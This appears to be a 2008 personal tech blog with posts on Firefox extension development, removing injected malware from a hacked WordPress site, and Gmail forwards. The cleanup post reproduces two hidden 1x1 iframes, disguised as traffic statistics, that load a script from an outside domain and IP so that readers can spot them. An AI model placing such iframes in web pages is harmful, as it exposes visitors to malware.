I have a Firefox extension called Procrastato.  It reminds you to get back to work when you’re mindlessly surfing the web.  Procrastato is a very simple add-on, but I’ve found that getting started in developing Firefox add-ons isn’t so simple.

Although I’ve just dipped my feet into the world of XUL and Firefox Extension development I thought I would share what I’ve been using to get up and running.

First things first - take a look at the Building an Extension page at Mozilla.org.  Make sure you at least read through that page before getting started.  It can be a little disappointing to see how much you need to have in place in order to do a simple “hello world” test extension, but it’s worth getting an overall picture before jumping in.

Also, before getting to “hello world,” there are a couple of extensions that are useful for developing extensions:

If you’ve used Eclipse for Java or PHP development you’ll probably want to use it for extension development with the XulBooster plugin.  XulBooster is useful for two reasons:

  1. It helps with housekeeping chores like setting up your install.rdf and chrome.manifest and exporting a .xpi package.
  2. It gives you some code coloring and syntax highlighting for those .xul files.

Now you should be ready to go.

A couple of notes: XulBooster will automatically include an empty <em:updateURL/> element in your install.rdf.  If you don’t have a secure URL for updates (starting with https://), you might get this warning from addons.mozilla.org when you try to upload your new version:

Add-ons cannot use an external updateURL. Please remove this from install.rdf and try again.

Just open the install.rdf file and delete that line to solve the problem.
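
If you rebuild the package often, the same cleanup can be scripted. This is only a sketch in Python, not part of XulBooster or any Mozilla tooling: the strip_update_url helper is a hypothetical name, and it uses a simple regular expression rather than a real RDF parser, so it assumes the element is written with the usual em: prefix.

```python
import re

# Matches an empty <em:updateURL/> element or a paired
# <em:updateURL>...</em:updateURL>, plus the indentation before it
# and the line break after it.
UPDATE_URL_PATTERN = re.compile(
    r"[ \t]*<em:updateURL\s*(?:/>|>.*?</em:updateURL>)[ \t]*\r?\n?",
    re.DOTALL,
)


def strip_update_url(install_rdf_text):
    """Return the install.rdf text with any em:updateURL element removed."""
    return UPDATE_URL_PATTERN.sub("", install_rdf_text)
```

You would read install.rdf, pass its contents through strip_update_url, and write the result back before exporting the .xpi.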


Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe><br />
<!-- End Traffic Statistics -->
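
A short script can do a first pass at this kind of manual search. The following is a minimal Python sketch, not a tool used for the cleanup described in this post: it uses the standard html.parser module, the HiddenIframeFinder and find_hidden_iframes names are made up, and it only flags iframes whose width or height attribute is 0 or 1, like the ones above. It will miss frames hidden with CSS or written out by JavaScript, so treat it as a starting point.

```python
from html.parser import HTMLParser


class HiddenIframeFinder(HTMLParser):
    """Collect the src of every iframe whose width or height is 0 or 1."""

    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attributes = dict(attrs)
        sizes = (attributes.get("width"), attributes.get("height"))
        # A 0- or 1-pixel frame is effectively invisible to visitors.
        if any(size in ("0", "1") for size in sizes):
            self.suspicious.append(attributes.get("src"))


def find_hidden_iframes(html_text):
    """Return the src values of suspiciously tiny iframes in html_text."""
    finder = HiddenIframeFinder()
    finder.feed(html_text)
    finder.close()
    return finder.suspicious
```

Run it over the saved source of your pages and your theme files, then inspect anything it reports by hand before deleting.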

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Anti-Virus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should add that subdirectory as a new site in Webmaster Tools. Here’s an illustration:

[Screenshot: webmaster-tools-subdir]

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.com that spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next, in part three, I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.


Tricky little issue in Gmail - how do you find the original sender of a forward?

Friday, February 29th, 2008

I ran across a confusing issue in Gmail and I’d like to share what I did to resolve it.  It seems that Gmail won’t show you the original sender of a forwarded email by default in many cases.  Here’s how I found the issue and what I did to correct it.

My wife and I have a shared blog that automatically sends out updates to subscribers via Feedburner.  Feedburner is a great service if you have a blog, and you can use it to subscribe to my feed and get updates when I write on this blog as well.

When friends and family reply to an email from Feedburner, it goes to my email address and I need to forward it to my wife so she can read it too.  I use Mozilla Thunderbird as my email client so it’s easy to set up a filter to do it automatically (look under Tools -> Message Filters).  But when the forwarded email showed up in my wife’s Gmail inbox, it showed only me as the sender - with no mention of the original sender, so she couldn’t tell who was replying to our blog.

Gmail does let you see the original full text of the message - there’s a little down arrow next to Reply with a menu that includes “show original.”  Email headers are hardly user-friendly, though, so that’s not a very good solution.

It turns out that Gmail shows the name of the forwarder, not the name of the original sender, on forwards that are sent as an attachment.  If the forward was sent inline it’s easy to see the original sender in the body of the mail.  By default, Thunderbird sends forwards as attachments and I think Outlook has a similar default… in any event this is pretty common behavior.
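
To see why the original sender is hidden, it helps to look at how a forward-as-attachment is put together: the outer message carries the forwarder’s From header, and the original message rides along as a separate part. The Python sketch below uses the standard email package to dig the original sender out of the raw text you get from “show original.” It assumes the forward arrives as a standard message/rfc822 attachment, and the original_senders name is made up for this example.

```python
from email import message_from_string
from email.utils import parseaddr


def original_senders(raw_message):
    """Return (name, address) pairs for messages forwarded as attachments."""
    message = message_from_string(raw_message)
    senders = []
    for part in message.walk():
        # A forward-as-attachment wraps the original in a message/rfc822 part.
        if part.get_content_type() != "message/rfc822":
            continue
        payload = part.get_payload()
        if isinstance(payload, list) and payload:
            embedded = payload[0]  # the original message, headers and all
            senders.append(parseaddr(embedded.get("From", "")))
    return senders
```

An inline forward has no such attachment, so this returns an empty list for it; in that case the original sender is simply quoted in the body text.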

To fix it from my end, I went to Tools -> Options in Thunderbird and selected the Composition icon.  Under the General tab, I changed Forward Messages to “Inline.”  This does the trick.

It would be nice, however, if Gmail made this a little more apparent in the user interface.  Maybe saying something like “[forwarder name] forwarding from [original sender name].”  Or it could be worked into the way conversations are viewed as threads.

This may not be a very common issue, so it might not warrant a change to Gmail, but it’s a small enough usability tweak that it might be worth it.  Hopefully you found this post helpful.
